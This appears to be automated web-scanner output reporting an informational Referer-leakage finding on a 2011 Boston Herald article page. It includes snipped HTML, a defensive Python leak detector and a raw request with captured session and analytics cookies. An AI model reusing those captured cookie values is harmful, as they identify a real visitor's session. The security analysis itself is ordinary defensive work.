X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Local Coverage - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/regional/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1312541%26format%3Demail&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div id="bylineArea">
                                        <img class="bylineImage" src="http://cache.heraldinteractive.com/images/siteImages/reporters/daveWedge.jpg?1=1" alt="Dave Wedge" />
                                       <span class="bold">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(108) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Feds: Fake cop scammed dates');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://www.myspace.com" >website</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(108) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a..." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/"><img src="http://multimedia.heraldinteractive.com/images/20110107/stp/c59fd8_Snake_01082011.jpg" alt="Owner hopes pet snakes its way to safety" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.289. http://www.bostonherald.com/news/regional/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The page was loaded from a URL containing a query string, and the response contains links to, and loads resources from, other domains (visible in the snipped response below). When the browser follows one of those links or fetches one of those resources, it sends the page URL, query string included, to the third-party host in the Referer header unless a referrer policy restricts it.
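Issues 17.287, 17.288 and 17.289 all report the same condition: a page URL that carries a query string, and a response that links to or loads resources from other domains, so that the query string reaches those hosts in the Referer header. The following is an added example, written for this report and not code from the crawler or from bostonherald.com, that reproduces the check in Python: it resolves every href, src and action in a response against the page URL, keeps the hosts that differ from the page's own, and then asks whether a Referrer-Policy header or a meta referrer tag would stop the query string from leaving. The sample page is constructed from the snipped markup above and is not the real page. The Referrer-Policy mechanism postdates this 2011 report, so, as browsers of that era did, an absent policy is treated as sending the full URL; it also compares full hostnames rather than registrable domains, so sibling subdomains are flagged as external.

```python
"""Detect cross-domain Referer leakage of a page's query string.

Hypothetical example modelled on the scanner findings above. The sample
page is constructed from the snipped response and is not the real page.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Attributes whose value makes the browser fetch or navigate to a URL, and
# therefore emit a Referer header naming the current page.
URL_ATTRS = ("href", "src", "action")

# Referrer policies under which a cross-origin request still carries the full
# page URL, query string included. Every other named policy strips the query.
LEAKY_POLICIES = {"unsafe-url", "no-referrer-when-downgrade"}


class _LinkCollector(HTMLParser):
    """Collect outbound URLs and any <meta name="referrer"> policy."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.urls = []
        self.meta_policy = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "meta" and (attrs.get("name") or "").lower() == "referrer":
            self.meta_policy = (attrs.get("content") or "").strip().lower()
        for name in URL_ATTRS:
            value = attrs.get(name)
            if value:
                # Resolve relative references so "/news/regional/" is
                # attributed to the page's own host, not treated as external.
                self.urls.append(urljoin(self.page_url, value.strip()))


def collect_links(page_url, html):
    """Return (absolute URLs referenced by the page, meta referrer policy or None)."""
    collector = _LinkCollector(page_url)
    collector.feed(html)
    return collector.urls, collector.meta_policy


def external_hosts(page_url, urls):
    """Hosts other than the page's own host that the page links to or loads from.

    Full hostnames are compared, so a sibling subdomain counts as external; a
    stricter scanner would compare registrable domains (eTLD+1) instead.
    """
    page_host = urlsplit(page_url).hostname
    hosts = set()
    for url in urls:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            continue  # javascript:, mailto: and the like never carry a Referer
        if parts.hostname != page_host:
            hosts.add(parts.hostname)
    return hosts


def referer_leak(page_url, html, response_headers=None):
    """Third-party hosts that would receive the page's query string in the
    Referer header; an empty set means nothing leaks."""
    if not urlsplit(page_url).query:
        return set()  # no query string, nothing for the Referer to disclose
    urls, meta_policy = collect_links(page_url, html)
    headers = {k.lower(): v for k, v in (response_headers or {}).items()}
    # A <meta name="referrer"> applied while the document is parsed takes
    # effect after the response header and therefore overrides it.
    policy = meta_policy or headers.get("referrer-policy", "").strip().lower()
    # No policy at all is treated as leaking, as 2011-era browsers behaved;
    # current browsers default to strict-origin-when-cross-origin instead.
    if policy and policy not in LEAKY_POLICIES:
        return set()
    return external_hosts(page_url, urls)


# Constructed sample page based on the snipped markup in the report above.
PAGE_URL = "http://www.bostonherald.com/news/regional/?srvc=home&position=4"
SAMPLE_HTML = """
<html><head>
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://cache.heraldinteractive.com/js/common.js"></script>
</head><body>
<a href="/"><img src="http://cache.heraldinteractive.com/images/edge.gif"></a>
<a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
<a href="javascript:void(0);">Features</a>
<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">Follow Us</a>
<a href="/news/regional/view/20110128another_winter_wallop_batters_boston/">Story</a>
<noscript><img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562" /></noscript>
</body></html>
"""

if __name__ == "__main__":
    for host in sorted(referer_leak(PAGE_URL, SAMPLE_HTML)):
        print("query string leaks to", host)
```

Run against the sample, the check lists the five third-party hosts that would see srvc=home&position=4; with a Referrer-Policy of strict-origin-when-cross-origin, or a page URL without a query string, it reports nothing.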

Request

GET /news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:38:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 95412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Local Coverage - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/regional/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1312541%26format%3Dcomments%26srvc%3Dhome%26position%3Dactive&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div id="bylineArea">
                                        <img class="bylineImage" src="http://cache.heraldinteractive.com/images/siteImages/reporters/daveWedge.jpg?1=1" alt="Dave Wedge" />
                                       <span class="bold">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(108) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Feds: Fake cop scammed dates');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982350,5,0);" ><img id="thumb_up_1982350" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982350,1,0);"><img id="thumb_down_1982350" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982350, 'chefsonny');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982350#cnum1982350"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982350','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982370,5,0);" ><img id="thumb_up_1982370" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982370,1,0);"><img id="thumb_down_1982370" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982370, 'skipper66666');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982370#cnum1982370"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982370','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982389,5,0);" ><img id="thumb_up_1982389" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982389,1,0);"><img id="thumb_down_1982389" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982389, 'skeezix66');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982389#cnum1982389"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982389','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982394,5,0);" ><img id="thumb_up_1982394" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982394,1,0);"><img id="thumb_down_1982394" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982394, 'WhyWorry');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" />&nbsp;Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982394#cnum1982394"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" />&nbsp;Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982394','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
<!-- Equalize the height AND preload the f2 images -->
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982396,5,0);" ><img id="thumb_up_1982396" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982396,1,0);"><img id="thumb_down_1982396" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
